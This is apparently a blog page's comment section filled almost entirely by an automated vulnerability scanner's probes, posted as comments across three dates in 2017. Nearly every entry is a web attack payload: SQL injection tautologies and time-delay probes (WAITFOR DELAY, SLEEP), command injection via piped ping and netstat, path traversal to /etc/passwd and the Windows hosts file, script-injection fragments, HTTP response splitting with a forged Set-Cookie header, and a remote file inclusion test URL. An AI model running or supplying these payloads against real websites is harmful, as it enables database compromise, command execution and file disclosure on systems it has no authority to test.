 
 
 
 
June 7, 2017 5:19 PM
 
1
 
 
 
 
June 7, 2017 5:20 PM
 
ping -c2 -i90 localhost
 
 
 
 
June 7, 2017 5:20 PM
 
1
 
 
 
 
June 7, 2017 5:20 PM
 
|ping -c2 -i90 localhost
 
 
 
 
June 7, 2017 5:20 PM
 
1
 
 
 
 
June 7, 2017 5:21 PM
 
|ping -c2 -i90 localhost|
 
 
 
 
June 7, 2017 5:21 PM
 
1
 
 
 
 
June 7, 2017 5:21 PM
 
1WAITFOR DELAY '00:00:28'
 
 
 
 
June 7, 2017 5:21 PM
 
1
 
 
 
 
June 7, 2017 5:21 PM
 
1;WAITFOR DELAY '00:00:28';
 
 
 
 
June 7, 2017 5:21 PM
 
1
 
 
 
 
June 7, 2017 5:22 PM
 
1);WAITFOR DELAY '00:00:28'--
 
 
 
 
June 7, 2017 5:22 PM
 
1
 
 
 
 
June 7, 2017 5:22 PM
 
1';WAITFOR DELAY '00:00:28'--
 
 
 
 
June 7, 2017 5:22 PM
 
1
 
 
 
 
June 7, 2017 5:23 PM
 
1');WAITFOR DELAY '00:00:28'--
 
 
 
 
June 7, 2017 5:23 PM
 
1
 
 
 
 
June 7, 2017 5:23 PM
 
1',0,0);WAITFOR DELAY'00:00:28'--
 
 
 
 
June 7, 2017 5:23 PM
 
1
 
 
 
 
June 7, 2017 5:23 PM
 
1 + (SELECT 0 FROM (SELECT SLEEP(28))qsqli_1111)
 
 
 
 
June 7, 2017 5:23 PM
 
1
 
 
 
 
June 7, 2017 5:24 PM
 
1' + (SELECT 0 FROM (SELECT SLEEP(28))qsqli_2222) + '
 
 
 
 
June 7, 2017 5:24 PM
 
1
 
 
 
 
June 7, 2017 5:38 PM
 
1
 
 
 
 
June 7, 2017 5:39 PM
 
1
 
 
 
 
June 7, 2017 5:39 PM
 
1
 
 
 
 
August 2, 2017 5:34 AM
 
1
 
 
 
 
August 2, 2017 6:54 PM
 
1
 
 
 
 
August 2, 2017 6:54 PM
 
1
 
 
 
 
August 2, 2017 6:54 PM
 
1
 
 
 
 
August 2, 2017 6:54 PM
 
1
 
 
 
 
August 2, 2017 6:54 PM
 
1
 
 
 
 
August 2, 2017 6:54 PM
 
1
 
 
 
 
August 2, 2017 6:54 PM
 
1
 
 
 
 
August 2, 2017 6:54 PM
 
1
 
 
 
 
August 2, 2017 6:54 PM
 
1
 
 
 
 
August 2, 2017 6:54 PM
 
SRC=//localhost/j>
 
 
 
 
August 2, 2017 6:54 PM
 
1
 
 
 
 
August 2, 2017 6:54 PM
 
1
 
 
 
 
August 2, 2017 6:54 PM
 
<=7;//<
 
 
 
 
August 2, 2017 6:54 PM
 
1
 
 
 
 
August 2, 2017 6:54 PM
 
<IMG SRC==7>
 
 
 
 
August 2, 2017 6:54 PM
 
1
 
 
 
 
August 2, 2017 6:54 PM
 
1
 
 
 
 
August 2, 2017 6:54 PM
 
<STYLE type=text/css a=3>BODY{background:url(=7)}</STYLE>
 
 
 
 
August 2, 2017 6:54 PM
 
1
 
 
 
 
August 2, 2017 6:54 PM
 
1
 
 
 
 
August 2, 2017 6:55 PM
 
' X3049308712Y2Z
 
 
 
 
August 2, 2017 6:55 PM
 
X3049308712Y2Z
 
 
 
 
August 2, 2017 6:55 PM
 
1
 
 
 
 
August 2, 2017 6:55 PM
 
<
script a=4>=7<
/script>
 
 
 
 
August 2, 2017 6:55 PM
 
1
 
 
 
 
August 2, 2017 6:55 PM
 
_q(y)
 
 
 
 
August 2, 2017 6:55 PM
 
1
 
 
 
 
August 2, 2017 6:55 PM
 
http://localhost/j
 
 
 
 
August 2, 2017 6:55 PM
 
q
Content-Type:text/html
Content-Length: 190

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: a=q
Content-Length: 2

AA
 
 
 
 
August 2, 2017 6:55 PM
 
1
 
 
 
 
August 2, 2017 6:55 PM
 
1'
 
 
 
 
August 2, 2017 6:55 PM
 
1
 
 
 
 
August 2, 2017 6:55 PM
 
1
 
 
 
 
August 2, 2017 6:55 PM
 
;--
 
 
 
 
August 2, 2017 6:55 PM
 
#
 
 
 
 
August 2, 2017 6:55 PM
 
1
 
 
 
 
August 2, 2017 6:55 PM
 
1
 
 
 
 
August 2, 2017 6:55 PM
 
``
 
 
 
 
August 2, 2017 6:55 PM
 
1
 
 
 
 
August 2, 2017 6:55 PM
 
,
 
 
 
 
August 2, 2017 6:55 PM
 
1
 
 
 
 
August 2, 2017 6:55 PM
 
(
 
 
 
 
August 2, 2017 6:55 PM
 
1e309
 
 
 
 
August 2, 2017 6:55 PM
 
1
 
 
 
 
August 2, 2017 6:55 PM
 
1
 
 
 
 
August 2, 2017 6:55 PM
 
/../../../../../../../etc/passwd
 
 
 
 
August 2, 2017 6:55 PM
 
/../../../../../../../etc/passwd
 
 
 
 
August 2, 2017 6:55 PM
 
../../../../../../../etc/passwd
 
 
 
 
August 2, 2017 6:55 PM
 
//..//..//..//..//..//..//..//etc/passwd
 
 
 
 
August 2, 2017 6:55 PM
 
1
 
 
 
 
August 2, 2017 6:55 PM
 
//....//....//....//....//....//....//....//etc/passwd
 
 
 
 
August 2, 2017 6:56 PM
 
../../../../../../../Windows/System32/drivers/etc/hosts
 
 
 
 
August 2, 2017 6:56 PM
 
1
 
 
 
 
August 2, 2017 6:56 PM
 
1
 
 
 
 
August 2, 2017 6:56 PM
 
a(){}phpinfo(); function a
 
 
 
 
August 2, 2017 6:56 PM
 
|netstat -an
 
 
 
 
August 2, 2017 6:56 PM
 
1
 
 
 
 
August 2, 2017 6:56 PM
 
http://rfitest/
 
 
 
 
August 2, 2017 6:56 PM
 
1
 
 
 
 
August 2, 2017 6:56 PM
 
qxss(X3049308712Y2Z);
 
 
 
 
August 2, 2017 6:56 PM
 
;(function(){qxss});//
 
 
 
 
August 2, 2017 6:56 PM
 
1
 
 
 
 
August 2, 2017 6:56 PM
 
);(function(){qxss});//
 
 
 
 
August 2, 2017 6:56 PM
 
1
 
 
 
 
August 2, 2017 6:56 PM
 
';(function(){qxss});//
 
 
 
 
August 2, 2017 6:56 PM
 
9;(function(){qxss});//
 
 
 
 
August 2, 2017 6:56 PM
 
9
;(function(){qxss});//
 
 
 
 
August 2, 2017 6:56 PM
 
*/;(function(){qxss});/*
 
 
 
 
August 2, 2017 6:56 PM
 
1
 
 
 
 
August 2, 2017 6:56 PM
 
1') or 2634=2634 --
 
 
 
 
August 2, 2017 6:56 PM
 
1') and 2634=1123 --
 
 
 
 
August 2, 2017 6:56 PM
 
1
 
 
 
 
August 2, 2017 6:56 PM
 
1
 
 
 
 
August 2, 2017 6:56 PM
 
1
 
 
 
 
August 2, 2017 6:56 PM
 
1
 
 
 
 
August 2, 2017 6:56 PM
 
1
 
 
 
 
August 2, 2017 6:56 PM
 
1
 
 
 
 
August 2, 2017 6:56 PM
 
1' or 3789=3789 --
 
 
 
 
August 2, 2017 6:56 PM
 
1' and 3789=1391 --
 
 
 
 
August 2, 2017 6:56 PM
 
1' /* or __Q_1__ */oR 3789=2398 + 1391 -- aND 1390
 
 
 
 
August 2, 2017 6:56 PM
 
1' /* or __Q_1__ */aND 3789=2398 + 1390 -- oR 1391
 
 
 
 
August 2, 2017 6:56 PM
 
1' /* or __Q_2__ */Or NULL IS NULL-- AnD 7643
 
 
 
 
August 2, 2017 6:56 PM
 
1' /* or __Q_2__ */AnD 7643 IS NULL-- Or
 
 
 
 
August 2, 2017 6:56 PM
 
1 or 4325=4325 --
 
 
 
 
August 2, 2017 6:56 PM
 
1 and 4325=2728 --
 
 
 
 
August 2, 2017 6:56 PM
 
1 /* or __Q_1__ */oR 4325=1597 + 2728 -- aND 2729
 
 
 
 
August 2, 2017 6:56 PM
 
1 /* or __Q_1__ */aND 4325=1597 + 2729 -- oR 2728
 
 
 
 
August 2, 2017 6:56 PM
 
1 /* or __Q_2__ */Or NULL IS NULL -- AnD 3251
 
 
 
 
August 2, 2017 6:56 PM
 
1 /* or __Q_2__ */AnD 3251 IS NULL -- Or
 
 
 
 
August 2, 2017 6:56 PM
 
1 or NULL IS NULL
 
 
 
 
August 2, 2017 6:56 PM
 
1 or 6248 IS NULL
 
 
 
 
August 2, 2017 6:56 PM
 
1
 
 
 
 
August 2, 2017 6:57 PM
 
1 and NULL IS NULL
 
 
 
 
August 2, 2017 6:57 PM
 
1 and 7248 IS NULL
 
 
 
 
August 2, 2017 6:57 PM
 
1 aND 7248=2491 + 4757
 
 
 
 
August 2, 2017 6:57 PM
 
1 aND 7248=2491 + 4756
 
 
 
 
August 2, 2017 6:57 PM
 
1 AnD 7248=7248
 
 
 
 
August 2, 2017 6:57 PM
 
1 AnD 7248=4757
 
 
 
 
August 2, 2017 6:57 PM
 
1') or 'swqtp'='swqtp
 
 
 
 
August 2, 2017 6:57 PM
 
1') and 'swqtp'='ptqws
 
 
 
 
August 2, 2017 6:57 PM
 
1
 
 
 
 
August 2, 2017 6:57 PM
 
1' or 'tpklq'='tpklq
 
 
 
 
August 2, 2017 6:57 PM
 
1' and 'tpklq'='xqlkp
 
 
 
 
August 2, 2017 6:57 PM
 
1' /* or __Q_1__ */oR ' aND xqlkp'=' aND xqlkp
 
 
 
 
August 2, 2017 6:57 PM
 
1' /* or __Q_1__ */aND ' oR mktrs'=' aND ljhgy
 
 
 
 
August 2, 2017 6:57 PM
 
1' /* or __Q_2__ */Or ' AnD mjnfg'LIKE' AnD mjnfg
 
 
 
 
August 2, 2017 6:57 PM
 
1' /* or __Q_2__ */AnD ' Or mjnfg'LIKE' AnD fhdgr
 
 
 
 
August 2, 2017 6:57 PM
 
11 or 11=11
 
 
 
 
August 2, 2017 6:57 PM
 
11 or 11=12
 
 
 
 
August 2, 2017 6:57 PM
 
15 oR 9=8 + 1
 
 
 
 
August 2, 2017 6:57 PM
 
15 oR 9=9 + 1
 
 
 
 
August 2, 2017 6:57 PM
 
16 Or 9=9
 
 
 
 
August 2, 2017 6:57 PM
 
16 Or 9=8
 
 
 
 
August 2, 2017 6:57 PM
 
ping -c2 -i90 localhost
 
 
 
 
August 2, 2017 6:57 PM
 
1
 
 
 
 
August 2, 2017 6:57 PM
 
|ping -c2 -i90 localhost
 
 
 
 
August 2, 2017 6:57 PM
 
1
 
 
 
 
August 2, 2017 6:57 PM
 
|ping -c2 -i90 localhost|
 
 
 
 
August 2, 2017 6:57 PM
 
1
 
 
 
 
August 2, 2017 6:58 PM
 
1WAITFOR DELAY '00:00:28'
 
 
 
 
August 2, 2017 6:58 PM
 
1
 
 
 
 
August 2, 2017 6:58 PM
 
1;WAITFOR DELAY '00:00:28';
 
 
 
 
August 2, 2017 6:58 PM
 
1
 
 
 
 
August 2, 2017 6:58 PM
 
1);WAITFOR DELAY '00:00:28'--
 
 
 
 
August 2, 2017 6:58 PM
 
1
 
 
 
 
August 2, 2017 6:59 PM
 
1';WAITFOR DELAY '00:00:28'--
 
 
 
 
August 2, 2017 6:59 PM
 
1
 
 
 
 
August 2, 2017 6:59 PM
 
1');WAITFOR DELAY '00:00:28'--
 
 
 
 
August 2, 2017 6:59 PM
 
1
 
 
 
 
August 2, 2017 6:59 PM
 
1',0,0);WAITFOR DELAY'00:00:28'--
 
 
 
 
August 2, 2017 6:59 PM
 
1
 
 
 
 
August 2, 2017 7:00 PM
 
1 + (SELECT 0 FROM (SELECT SLEEP(28))qsqli_1111)
 
 
 
 
August 2, 2017 7:00 PM
 
1
 
 
 
 
August 2, 2017 7:00 PM
 
1' + (SELECT 0 FROM (SELECT SLEEP(28))qsqli_2222) + '
 
 
 
 
August 2, 2017 7:00 PM
 
1
 
 
 
 
August 2, 2017 7:25 PM
 
1
 
 
 
 
August 2, 2017 7:26 PM
 
1
 
 
 
 
August 2, 2017 7:26 PM
 
1
 
 
 
 
October 5, 2017 10:43 AM
 
1
 
 
 
 
October 6, 2017 5:59 AM
 
1
 
 
 
 
October 6, 2017 5:59 AM
 
1
 
 
 
 
October 6, 2017 5:59 AM
 
1
 
 
 
 
October 6, 2017 5:59 AM
 
1
 
 
 
 
October 6, 2017 5:59 AM
 
1
 
 
 
 
October 6, 2017 5:59 AM
 
1
 
 
 
 
October 6, 2017 5:59 AM
 
1
 
 
 
 
October 6, 2017 5:59 AM
 
1
 
 
 
 
October 6, 2017 6:00 AM
 
1
 
 
 
 
October 6, 2017 6:00 AM
 
SRC=//localhost/j>
 
 
 
 
October 6, 2017 6:00 AM
 
1
 
 
 
 
October 6, 2017 6:00 AM
 
<=7;//<
 
 
 
 
October 6, 2017 6:00 AM
 
<IMG SRC==7>
 
 
 
 
October 6, 2017 6:00 AM
 
1
 
 
 
 
October 6, 2017 6:00 AM
 
<META HTTP-EQUIV=refresh CONTENT=0;url==7
 
 
 
 
October 6, 2017 6:00 AM
 
1
 
 
 
 
October 6, 2017 6:00 AM
 
1
 
 
 
 
October 6, 2017 6:00 AM
 
<STYLE type=text/css a=3>BODY{background:url(=7)}</STYLE>
 
 
 
 
October 6, 2017 6:00 AM
 
1
 
 
 
 
October 6, 2017 6:00 AM
 
1
 
 
 
 
October 6, 2017 6:00 AM
 
1
 
 
 
 
October 6, 2017 6:00 AM
 
1
 
 
 
 
October 6, 2017 6:00 AM
 
X146491316Y2Z
 
 
 
 
October 6, 2017 6:00 AM
 
1
 
 
 
 
October 6, 2017 6:00 AM
 
<
script a=4>=7<
/script>
 
 
 
 
October 6, 2017 6:00 AM
 
1
 
 
 
 
October 6, 2017 6:00 AM
 
_q(y)
 
 
 
 
October 6, 2017 6:01 AM
 
http://localhost/j
 
 
 
 
October 6, 2017 6:01 AM
 
1
 
 
 
 
October 6, 2017 6:01 AM
 
q
Content-Type:text/html
Content-Length: 190

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: a=q
Content-Length: 2

AA
 
 
 
 
October 6, 2017 6:01 AM
 
1
 
 
 
 
October 6, 2017 6:01 AM
 
1'
 
 
 
 
October 6, 2017 6:01 AM
 
1
 
 
 
 
October 6, 2017 6:01 AM
 
;--
 
 
 
 
October 6, 2017 6:01 AM
 
1
 
 
 
 
October 6, 2017 6:01 AM
 
#
 
 
 
 
October 6, 2017 6:01 AM
 
1
 
 
 
 
October 6, 2017 6:01 AM
 
/*
 
 
 
 
October 6, 2017 6:01 AM
 
1
 
 
 
 
October 6, 2017 6:01 AM
 
1
 
 
 
 
October 6, 2017 6:01 AM
 
,
 
 
 
 
October 6, 2017 6:01 AM
 
(
 
 
 
 
October 6, 2017 6:01 AM
 
1e309
 
 
 
 
October 6, 2017 6:01 AM
 
1
 
 
 
 
October 6, 2017 6:01 AM
 
1
 
 
 
 
October 6, 2017 6:01 AM
 
/../../../../../../../etc/passwd
 
 
 
 
October 6, 2017 6:01 AM
 
../../../../../../../etc/passwd
 
 
 
 
October 6, 2017 6:01 AM
 
1
 
 
 
 
October 6, 2017 6:01 AM
 
//..//..//..//..//..//..//..//etc/passwd
 
 
 
 
October 6, 2017 6:01 AM
 
1
 
 
 
 
October 6, 2017 6:02 AM
 
//....//....//....//....//....//....//....//etc/passwd
 
 
 
 
October 6, 2017 6:02 AM
 
../../../../../../../Windows/System32/drivers/etc/hosts
 
 
 
 
October 6, 2017 6:02 AM
 
1
 
 
 
 
October 6, 2017 6:02 AM
 
1
 
 
 
 
October 6, 2017 6:02 AM
 
1
 
 
 
 
October 6, 2017 6:02 AM
 
1
 
 
 
 
October 6, 2017 6:02 AM
 
a(){}phpinfo(); function a
 
 
 
 
October 6, 2017 6:02 AM
 
1
 
 
 
 
October 6, 2017 6:02 AM
 
|netstat -an
 
 
 
 
October 6, 2017 6:02 AM
 
http://rfitest/
 
 
 
 
October 6, 2017 6:02 AM
 
qxss(X146491316Y2Z);
 
 
 
 
October 6, 2017 6:02 AM
 
1
 
 
 
 
October 6, 2017 6:02 AM
 
);(function(){qxss});//
 
 
 
 
October 6, 2017 6:02 AM
 
';(function(){qxss});//
 
 
 
 
October 6, 2017 6:02 AM
 
1
 
 
 
 
October 6, 2017 6:02 AM
 
1
 
 
 
 
October 6, 2017 6:02 AM
 
9
;(function(){qxss});//
 
 
 
 
October 6, 2017 6:03 AM
 
1
 
 
 
 
October 6, 2017 6:03 AM
 
1') or 2634=2634 --
 
 
 
 
October 6, 2017 6:03 AM
 
1') and 2634=1123 --
 
 
 
 
October 6, 2017 6:03 AM
 
1') /* or __Q_1__ */oR 2634=1511 + 1123 -- aND 1124
 
 
 
 
October 6, 2017 6:03 AM
 
1') /* or __Q_1__ */aND 2634=1511 + 1124 -- oR 1123
 
 
 
 
October 6, 2017 6:03 AM
 
1') /* or __Q_2__ */Or NULL IS NULL-- AnD 5867
 
 
 
 
October 6, 2017 6:03 AM
 
1') /* or __Q_2__ */AnD 5867 IS NULL-- Or NULL
 
 
 
 
October 6, 2017 6:03 AM
 
1' or 3789=3789 --
 
 
 
 
October 6, 2017 6:03 AM
 
1' and 3789=1391 --
 
 
 
 
October 6, 2017 6:03 AM
 
1' /* or __Q_1__ */oR 3789=2398 + 1391 -- aND 1390
 
 
 
 
October 6, 2017 6:03 AM
 
1' /* or __Q_1__ */aND 3789=2398 + 1390 -- oR 1391
 
 
 
 
October 6, 2017 6:03 AM
 
1' /* or __Q_2__ */Or NULL IS NULL-- AnD 7643
 
 
 
 
October 6, 2017 6:03 AM
 
1' /* or __Q_2__ */AnD 7643 IS NULL-- Or
 
 
 
 
October 6, 2017 6:03 AM
 
1 or 4325=4325 --
 
 
 
 
October 6, 2017 6:03 AM
 
1 and 4325=2728 --
 
 
 
 
October 6, 2017 6:03 AM
 
1 /* or __Q_1__ */oR 4325=1597 + 2728 -- aND 2729
 
 
 
 
October 6, 2017 6:03 AM
 
1
 
 
 
 
October 6, 2017 6:03 AM
 
1 or NULL IS NULL
 
 
 
 
October 6, 2017 6:03 AM
 
1 or 6248 IS NULL
 
 
 
 
October 6, 2017 6:03 AM
 
1 oR 6248=2491 + 3757
 
 
 
 
October 6, 2017 6:03 AM
 
1 oR 6248=2491 + 3756
 
 
 
 
October 6, 2017 6:03 AM
 
1 Or 6248=6248
 
 
 
 
October 6, 2017 6:03 AM
 
1 Or 6248=3757
 
 
 
 
October 6, 2017 6:03 AM
 
1 and NULL IS NULL
 
 
 
 
October 6, 2017 6:03 AM
 
1 and 7248 IS NULL
 
 
 
 
October 6, 2017 6:03 AM
 
1 aND 7248=2491 + 4757
 
 
 
 
October 6, 2017 6:03 AM
 
1 aND 7248=2491 + 4756
 
 
 
 
October 6, 2017 6:03 AM
 
1 AnD 7248=7248
 
 
 
 
October 6, 2017 6:03 AM
 
1 AnD 7248=4757
 
 
 
 
October 6, 2017 6:03 AM
 
1') or 'swqtp'='swqtp
 
 
 
 
October 6, 2017 6:03 AM
 
1
 
 
 
 
October 6, 2017 6:03 AM
 
1
 
 
 
 
October 6, 2017 6:03 AM
 
1
 
 
 
 
October 6, 2017 6:03 AM
 
1
 
 
 
 
October 6, 2017 6:03 AM
 
1
 
 
 
 
October 6, 2017 6:03 AM
 
1
 
 
 
 
October 6, 2017 6:03 AM
 
1' or 'tpklq'='tpklq
 
 
 
 
October 6, 2017 6:03 AM
 
1' and 'tpklq'='xqlkp
 
 
 
 
October 6, 2017 6:03 AM
 
1' /* or __Q_1__ */oR ' aND xqlkp'=' aND xqlkp
 
 
 
 
October 6, 2017 6:03 AM
 
1' /* or __Q_1__ */aND ' oR mktrs'=' aND ljhgy
 
 
 
 
October 6, 2017 6:03 AM
 
1' /* or __Q_2__ */Or ' AnD mjnfg'LIKE' AnD mjnfg
 
 
 
 
October 6, 2017 6:03 AM
 
1' /* or __Q_2__ */AnD ' Or mjnfg'LIKE' AnD fhdgr
 
 
 
 
October 6, 2017 6:03 AM
 
11 or 11=11
 
 
 
 
October 6, 2017 6:03 AM
 
11 or 11=12
 
 
 
 
October 6, 2017 6:03 AM
 
15 oR 9=8 + 1
 
 
 
 
October 6, 2017 6:03 AM
 
15 oR 9=9 + 1
 
 
 
 
October 6, 2017 6:03 AM
 
16 Or 9=9
 
 
 
 
October 6, 2017 6:03 AM
 
16 Or 9=8
 
 
 
 
October 6, 2017 6:03 AM
 
ping -c2 -i90 localhost
 
 
 
 
October 6, 2017 6:03 AM
 
1
 
 
 
 
October 6, 2017 6:04 AM
 
|ping -c2 -i90 localhost
 
 
 
 
October 6, 2017 6:04 AM
 
1
 
 
 
 
October 6, 2017 6:04 AM
 
|ping -c2 -i90 localhost|
 
 
 
 
October 6, 2017 6:04 AM
 
1
 
 
 
 
October 6, 2017 6:04 AM
 
1WAITFOR DELAY '00:00:28'
 
 
 
 
October 6, 2017 6:05 AM
 
1
 
 
 
 
October 6, 2017 6:05 AM
 
1;WAITFOR DELAY '00:00:28';
 
 
 
 
October 6, 2017 6:05 AM
 
1
 
 
 
 
October 6, 2017 6:05 AM
 
1);WAITFOR DELAY '00:00:28'--
 
 
 
 
October 6, 2017 6:05 AM
 
1
 
 
 
 
October 6, 2017 6:06 AM
 
1';WAITFOR DELAY '00:00:28'--
 
 
 
 
October 6, 2017 6:06 AM
 
1
 
 
 
 
October 6, 2017 6:06 AM
 
1');WAITFOR DELAY '00:00:28'--
 
 
 
 
October 6, 2017 6:06 AM
 
1
 
 
 
 
October 6, 2017 6:07 AM
 
1',0,0);WAITFOR DELAY'00:00:28'--
 
 
 
 
October 6, 2017 6:07 AM
 
1
 
 
 
 
October 6, 2017 6:07 AM
 
1 + (SELECT 0 FROM (SELECT SLEEP(28))qsqli_1111)
 
 
 
 
October 6, 2017 6:07 AM
 
1
 
 
 
 
October 6, 2017 6:07 AM
 
1' + (SELECT 0 FROM (SELECT SLEEP(28))qsqli_2222) + '
 
 
 
 
October 6, 2017 6:08 AM
 
1
 
 
 
 
October 6, 2017 7:02 AM
 
1
 
 
 
 
October 6, 2017 7:03 AM
 
1
 
 
 
 
October 6, 2017 7:03 AM
 
1
 
 
 
 

Please login or register to comment on this post.

Twitter

Off The Blog